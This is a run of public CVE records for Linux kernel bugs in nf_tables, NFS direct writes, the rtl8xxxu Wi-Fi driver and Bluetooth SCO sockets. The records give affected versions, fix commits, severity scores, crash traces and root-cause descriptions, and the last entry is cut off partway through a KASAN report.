"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-12T16:55:56.231770Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T21:09:18.328Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"packageName": "linux",
"platforms": [
"Linux"
],
"product": "linux",
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git",
"vendor": "The Linux Kernel Organization",
"versions": [
{
"lessThan": "5.18-rc1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Lin Ma from Ant Security Light-Year Lab \u0026 ZJU"
}
],
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:12:45.871Z",
"orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
"shortName": "canonical"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040"
},
{
"tags": [
"mailing-list"
],
"url": "https://www.openwall.com/lists/oss-security/2024/01/12/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/01/12/1"
},
{
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family)",
"workarounds": [
{
"lang": "en",
"value": "Disabling unprivileged user namespaces mitigates the issue."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
"assignerShortName": "canonical",
"cveId": "CVE-2023-6040",
"datePublished": "2024-01-12T01:37:45.387Z",
"dateReserved": "2023-11-08T20:12:50.288Z",
"dateUpdated": "2025-06-17T21:09:18.328Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26958 (GCVE-0-2024-26958)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-08-28 14:42
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfs: fix UAF in direct writes
In production we have been hitting the following warning consistently
------------[ cut here ]------------
refcount_t: underflow; use-after-free.
WARNING: CPU: 17 PID: 1800359 at lib/refcount.c:28 refcount_warn_saturate+0x9c/0xe0
Workqueue: nfsiod nfs_direct_write_schedule_work [nfs]
RIP: 0010:refcount_warn_saturate+0x9c/0xe0
PKRU: 55555554
Call Trace:
<TASK>
? __warn+0x9f/0x130
? refcount_warn_saturate+0x9c/0xe0
? report_bug+0xcc/0x150
? handle_bug+0x3d/0x70
? exc_invalid_op+0x16/0x40
? asm_exc_invalid_op+0x16/0x20
? refcount_warn_saturate+0x9c/0xe0
nfs_direct_write_schedule_work+0x237/0x250 [nfs]
process_one_work+0x12f/0x4a0
worker_thread+0x14e/0x3b0
? ZSTD_getCParams_internal+0x220/0x220
kthread+0xdc/0x120
? __btf_name_valid+0xa0/0xa0
ret_from_fork+0x1f/0x30
This is because we're completing the nfs_direct_request twice in a row.
The source of this is when we have our commit requests to submit, we
process them and send them off, and then in the completion path for the
commit requests we have
if (nfs_commit_end(cinfo.mds))
nfs_direct_write_complete(dreq);
However since we're submitting asynchronous requests we sometimes have
one that completes before we submit the next one, so we end up calling
complete on the nfs_direct_request twice.
The only other place we use nfs_generic_commit_list() is in
__nfs_commit_inode, which wraps this call in a
nfs_commit_begin();
nfs_commit_end();
Which is a common pattern for this style of completion handling, one
that is also repeated in the direct code with get_dreq()/put_dreq()
calls around where we process events as well as in the completion paths.
Fix this by using the same pattern for the commit requests.
Before with my 200 node rocksdb stress running this warning would pop
every 10ish minutes. With my patch the stress test has been running for
several hours without popping.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad Version: af7cf057933f01dc7f33ddfb5e436ad598ed17ad |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26958",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T13:37:27.589314Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:10.748Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.688Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80d24b308b7ee7037fc90d8ac99f6f78df0a256f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3abc2d160ed8213948b147295d77d44a22c88fa3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e25447c35f8745337ea8bc0c9697fcac14df8605"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1daf52b5ffb24870fbeda20b4967526d8f9e12ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf54f66e1dd78990ec6b32177bca7e6ea2144a95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17f46b803d4f23c66cacce81db35fef3adb8f2af"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfs/direct.c",
"fs/nfs/write.c",
"include/linux/nfs_fs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6cd3f13aaa62970b5169d990e936b2e96943bc6a",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "80d24b308b7ee7037fc90d8ac99f6f78df0a256f",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "3abc2d160ed8213948b147295d77d44a22c88fa3",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "e25447c35f8745337ea8bc0c9697fcac14df8605",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "1daf52b5ffb24870fbeda20b4967526d8f9e12ab",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "cf54f66e1dd78990ec6b32177bca7e6ea2144a95",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
},
{
"lessThan": "17f46b803d4f23c66cacce81db35fef3adb8f2af",
"status": "affected",
"version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfs/direct.c",
"fs/nfs/write.c",
"include/linux/nfs_fs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.5"
},
{
"lessThan": "4.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.297",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.297",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs: fix UAF in direct writes\n\nIn production we have been hitting the following warning consistently\n\n------------[ cut here ]------------\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 17 PID: 1800359 at lib/refcount.c:28 refcount_warn_saturate+0x9c/0xe0\nWorkqueue: nfsiod nfs_direct_write_schedule_work [nfs]\nRIP: 0010:refcount_warn_saturate+0x9c/0xe0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __warn+0x9f/0x130\n ? refcount_warn_saturate+0x9c/0xe0\n ? report_bug+0xcc/0x150\n ? handle_bug+0x3d/0x70\n ? exc_invalid_op+0x16/0x40\n ? asm_exc_invalid_op+0x16/0x20\n ? refcount_warn_saturate+0x9c/0xe0\n nfs_direct_write_schedule_work+0x237/0x250 [nfs]\n process_one_work+0x12f/0x4a0\n worker_thread+0x14e/0x3b0\n ? ZSTD_getCParams_internal+0x220/0x220\n kthread+0xdc/0x120\n ? __btf_name_valid+0xa0/0xa0\n ret_from_fork+0x1f/0x30\n\nThis is because we\u0027re completing the nfs_direct_request twice in a row.\n\nThe source of this is when we have our commit requests to submit, we\nprocess them and send them off, and then in the completion path for the\ncommit requests we have\n\nif (nfs_commit_end(cinfo.mds))\n\tnfs_direct_write_complete(dreq);\n\nHowever since we\u0027re submitting asynchronous requests we sometimes have\none that completes before we submit the next one, so we end up calling\ncomplete on the nfs_direct_request twice.\n\nThe only other place we use nfs_generic_commit_list() is in\n__nfs_commit_inode, which wraps this call in a\n\nnfs_commit_begin();\nnfs_commit_end();\n\nWhich is a common pattern for this style of completion handling, one\nthat is also repeated in the direct code with get_dreq()/put_dreq()\ncalls around where we process events as well as in the completion paths.\n\nFix this by using the same pattern for the commit requests.\n\nBefore with my 200 node rocksdb stress running this warning would pop\nevery 10ish minutes. With my patch the stress test has been running for\nseveral hours without popping."
}
],
"providerMetadata": {
"dateUpdated": "2025-08-28T14:42:40.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6cd3f13aaa62970b5169d990e936b2e96943bc6a"
},
{
"url": "https://git.kernel.org/stable/c/4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5"
},
{
"url": "https://git.kernel.org/stable/c/80d24b308b7ee7037fc90d8ac99f6f78df0a256f"
},
{
"url": "https://git.kernel.org/stable/c/3abc2d160ed8213948b147295d77d44a22c88fa3"
},
{
"url": "https://git.kernel.org/stable/c/e25447c35f8745337ea8bc0c9697fcac14df8605"
},
{
"url": "https://git.kernel.org/stable/c/1daf52b5ffb24870fbeda20b4967526d8f9e12ab"
},
{
"url": "https://git.kernel.org/stable/c/cf54f66e1dd78990ec6b32177bca7e6ea2144a95"
},
{
"url": "https://git.kernel.org/stable/c/17f46b803d4f23c66cacce81db35fef3adb8f2af"
}
],
"title": "nfs: fix UAF in direct writes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26958",
"datePublished": "2024-05-01T05:19:04.069Z",
"dateReserved": "2024-02-19T14:20:24.200Z",
"dateUpdated": "2025-08-28T14:42:40.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27052 (GCVE-0-2024-27052)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work
The workqueue might still be running, when the driver is stopped. To
avoid a use-after-free, call cancel_work_sync() in rtl8xxxu_stop().
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 Version: e542e66b7c2ee2adeefdbb7f259f2f60cadf2819 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.5"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "58fe3bbddfec",
"status": "affected",
"version": "e542e66b7c2e",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27052",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-13T15:54:30.303932Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:59.357Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.987Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dddedfa3b29a63c2ca4336663806a6128b8545b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac512507ac89c01ed6cd4ca53032f52cdb23ea59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3518cea837de4d106efa84ddac18a07b6de1384e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/156012667b85ca7305cb363790d3ae8519a6f41e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7059cdb69f8e1a2707dd1e2f363348b507ed7707"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/58fe3bbddfec10c6b216096d8c0e517cd8463e3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1213acb478a7181cd73eeaf00db430f1e45b1361"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dddedfa3b29a63c2ca4336663806a6128b8545b4",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "ac512507ac89c01ed6cd4ca53032f52cdb23ea59",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "3518cea837de4d106efa84ddac18a07b6de1384e",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "156012667b85ca7305cb363790d3ae8519a6f41e",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "7059cdb69f8e1a2707dd1e2f363348b507ed7707",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "58fe3bbddfec10c6b216096d8c0e517cd8463e3a",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
},
{
"lessThan": "1213acb478a7181cd73eeaf00db430f1e45b1361",
"status": "affected",
"version": "e542e66b7c2ee2adeefdbb7f259f2f60cadf2819",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work\n\nThe workqueue might still be running, when the driver is stopped. To\navoid a use-after-free, call cancel_work_sync() in rtl8xxxu_stop()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:10.748Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dddedfa3b29a63c2ca4336663806a6128b8545b4"
},
{
"url": "https://git.kernel.org/stable/c/ac512507ac89c01ed6cd4ca53032f52cdb23ea59"
},
{
"url": "https://git.kernel.org/stable/c/3518cea837de4d106efa84ddac18a07b6de1384e"
},
{
"url": "https://git.kernel.org/stable/c/156012667b85ca7305cb363790d3ae8519a6f41e"
},
{
"url": "https://git.kernel.org/stable/c/7059cdb69f8e1a2707dd1e2f363348b507ed7707"
},
{
"url": "https://git.kernel.org/stable/c/58fe3bbddfec10c6b216096d8c0e517cd8463e3a"
},
{
"url": "https://git.kernel.org/stable/c/1213acb478a7181cd73eeaf00db430f1e45b1361"
}
],
"title": "wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27052",
"datePublished": "2024-05-01T12:54:42.547Z",
"dateReserved": "2024-02-19T14:20:24.214Z",
"dateUpdated": "2025-05-04T09:03:10.748Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27398 (GCVE-0-2024-27398)
Vulnerability from cvelistv5
Published
2024-05-13 10:22
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: Fix use-after-free bugs caused by sco_sock_timeout
When the sco connection is established and then, the sco socket
is releasing, timeout_work will be scheduled to judge whether
the sco disconnection is timeout. The sock will be deallocated
later, but it is dereferenced again in sco_sock_timeout. As a
result, the use-after-free bugs will happen. The root cause is
shown below:
Cleanup Thread | Worker Thread
sco_sock_release |
sco_sock_close |
__sco_sock_close |
sco_sock_set_timer |
schedule_delayed_work |
sco_sock_kill | (wait a time)
sock_put(sk) //FREE | sco_sock_timeout
| sock_hold(sk) //USE
The KASAN report triggered by POC is shown below:
[ 95.890016] ==================================================================
[ 95.890496] BUG: KASAN: slab-use-after-free in sco_sock_timeout+0x5e/0x1c0
[ 95.890755] Write of size 4 at addr ffff88800c388080 by task kworker/0:0/7
...
[ 95.890755] Workqueue: events sco_sock_timeout
[ 95.890755] Call Trace:
[ 95.890755] <TASK>
[ 95.890755] dump_stack_lvl+0x45/0x110
[ 95.890755] print_address_description+0x78/0x390
[ 95.890755] print_report+0x11b/0x250
[ 95.890755] ? __virt_addr_valid+0xbe/0xf0
[ 95.890755] ? sco_sock_timeout+0x5e/0x1c0
[ 95.890755] kasan_report+0x139/0x170
[ 95.890755] ? update_load_avg+0xe5/0x9f0
[ 95.890755] ? sco_sock_timeout+0x5e/0x1c0
[ 95.890755] kasan_check_range+0x2c3/0x2e0
[ 95.890755] sco_sock_timeout+0x5e/0x1c0
[ 95.890755] process_one_work+0x561/0xc50
[ 95.890755] worker_thread+0xab2/0x13c0
[ 95.890755] ? pr_cont_work+0x490/0x490
[ 95.890755] kthread+0x279/0x300
[ 95.890755] ? pr_cont_work+0x490/0x490
[ 95.890755] ? kthread_blkcg+0xa0/0xa0
[ 95.890755] ret_from_fork+0x34/0x60
[ 95.890755] ? kthread_blkcg+0xa0/0xa0
[ 95.890755] ret_from_fork_asm+0x11/0x20
[ 95.890755] </TASK>
[ 95.890755]
[ 95.890755] Allocated by task 506:
[ 95.890755] kasan_save_track+0x3f/0x70
[ 95.890755] __kasan_kmalloc+0x86/0x90
[ 95.890755] __kmalloc+0x17f/0x360
[ 95.890755] sk_prot_alloc+0xe1/0x1a0
[ 95.890755] sk_alloc+0x31/0x4e0
[ 95.890755] bt_sock_alloc+0x2b/0x2a0
[ 95.890755] sco_sock_create+0xad/0x320
[ 95.890755] bt_sock_create+0x145/0x320
[ 95.890755] __sock_create+0x2e1/0x650
[ 95.890755] __sys_socket+0xd0/0x280
[ 95.890755] __x64_sys_socket+0x75/0x80
[ 95.890755] do_syscall_64+0xc4/0x1b0
[ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f
[ 95.890755]
[ 95.890755] Freed by task 506:
[ 95.890755] kasan_save_track+0x3f/0x70
[ 95.890755] kasan_save_free_info+0x40/0x50
[ 95.890755] poison_slab_object+0x118/0x180
[ 95.890755] __kasan_slab_free+0x12/0x30
[ 95.890755] kfree+0xb2/0x240
[ 95.890755] __sk_destruct+0x317/0x410
[ 95.890755] sco_sock_release+0x232/0x280
[ 95.890755] sock_close+0xb2/0x210
[ 95.890755] __fput+0x37f/0x770
[ 95.890755] task_work_run+0x1ae/0x210
[ 95.890755] get_signal+0xe17/0xf70
[ 95.890755] arch_do_signal_or_restart+0x3f/0x520
[ 95.890755] syscall_exit_to_user_mode+0x55/0x120
[ 95.890755] do_syscall_64+0xd1/0x1b0
[ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f
[ 95.890755]
[ 95.890755] The buggy address belongs to the object at ffff88800c388000
[ 95.890755] which belongs to the cache kmalloc-1k of size 1024
[ 95.890755] The buggy address is located 128 bytes inside of
[ 95.890755] freed 1024-byte region [ffff88800c388000, ffff88800c388400)
[ 95.890755]
[ 95.890755] The buggy address belongs to the physical page:
[ 95.890755] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88800c38a800 pfn:0xc388
[ 95.890755] head: order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 95.890755] ano
---truncated---
References
